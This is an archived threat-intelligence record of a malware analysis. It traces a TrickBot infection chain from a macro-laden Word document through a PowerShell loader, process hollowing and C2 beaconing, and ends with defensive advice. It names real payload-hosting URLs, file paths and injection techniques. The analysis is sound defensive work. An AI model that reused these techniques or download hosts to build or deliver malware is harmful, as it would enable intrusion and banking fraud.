{ "id": "a9997eb5-d4c9-4505-bb34-e6b543f3c391", "created_at": "2026-04-06T00:07:52.635771Z", "updated_at": "2026-04-10T03:21:10.952509Z", "deleted_at": null, "sha1_hash": "793a6e943cb8d33d67346a6323b19af1382a0970", "title": "TrickBot Banking Trojan - DOC00039217.doc", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 164227, "plain_text": "TrickBot Banking Trojan - DOC00039217.doc\r\nArchived: 2026-04-05 16:54:03 UTC\r\nDOC00039217.doc is a malicious Word document that utilizes VBA macros to initiate a multi-stage infection,\r\nultimately deploying the TrickBot banking trojan.\r\nFilename: DOC00039217.doc\r\nMD5: 31529e5221e16a522e8aece4998036d7\r\nSample: Download via Reverse.it\r\nTechnical Analysis Walkthrough\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nStage 1: Document \u0026 VBA Analysis\r\nInitial header analysis reveals \"PK\" signatures and XML references, confirming this is an Office Open XML\r\n(DOCM) file masked as a .DOC. By renaming the extension to .ZIP, we can extract the internal contents.\r\nThe vbaProject.bin file contains the primary downloader script. Upon execution, it reaches out to\r\nhttp://appenzeller.fr/aaaa to retrieve the second stage.\r\nhttps://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nPage 1 of 4\n\nStage 2: VBScript \u0026 PowerShell Loader\r\nThe file aaaa is a VBScript that leverages Wscript.Shell to invoke PowerShell. It constructs a dynamic URL\r\n( amphibiousvehicle.eu/0chb7 ) to download the final payload.\r\nThe payload is saved to the %TEMP% folder as petya.exe . Despite the name, this is not the Petya ransomware,\r\nbut the TrickBot trojan.\r\nUnpacking the Payload (PECompact2)\r\nThe binary is packed with PECompact2. To find the Original Entry Point (OEP), we load the file into a debugger\r\nand locate the last JMP instruction before the null-byte padding.\r\n \r\nPersistence \u0026 Process Hollowing\r\nThe malware establishes itself in the %AppData%\\Roaming\\winapp directory as odsxa.exe . It uses Process\r\nHollowing to inject its malicious code into a legitimate svchost.exe process.\r\nhttps://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nPage 2 of 4\n\nThis allows the malware to operate within the security context of a trusted system process.\r\nC2 Communication \u0026 Modular Payload\r\nThe injected process first retrieves the victim's public IP via ipinfo.io/ip , then begins beaconing to multiple\r\nhardcoded C2 IPs over HTTPS.\r\nOver time, the malware downloads encrypted modules into the \\modules folder, extending its capability for\r\ncredential theft and banking fraud.\r\nhttps://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nPage 3 of 4\n\nConclusion \u0026 Detection\r\nThis multi-stage campaign highlights the evolution of TrickBot as a successor to Dyreza. The use of PowerShell\r\nloaders and encrypted modules makes it a highly flexible and dangerous threat.\r\nBest Practices:\r\nBlock known C2 IPs at the perimeter.\r\nDisable all Office Macros unless verified by the sender.\r\nMonitor for suspicious svchost.exe behavior and %AppData% folder modifications.\r\nFurther Reading: MalwareBytes | Fidelis Security\r\nSource: https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nhttps://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html" ], "report_names": [ "trickbot-banking-trojan-doc00039217doc.html" ], "threat_actors": [], "ts_created_at": 1775434072, "ts_updated_at": 1775791270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.pdf", "text": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.txt", "img": "https://archive.orkl.eu/793a6e943cb8d33d67346a6323b19af1382a0970.jpg" } }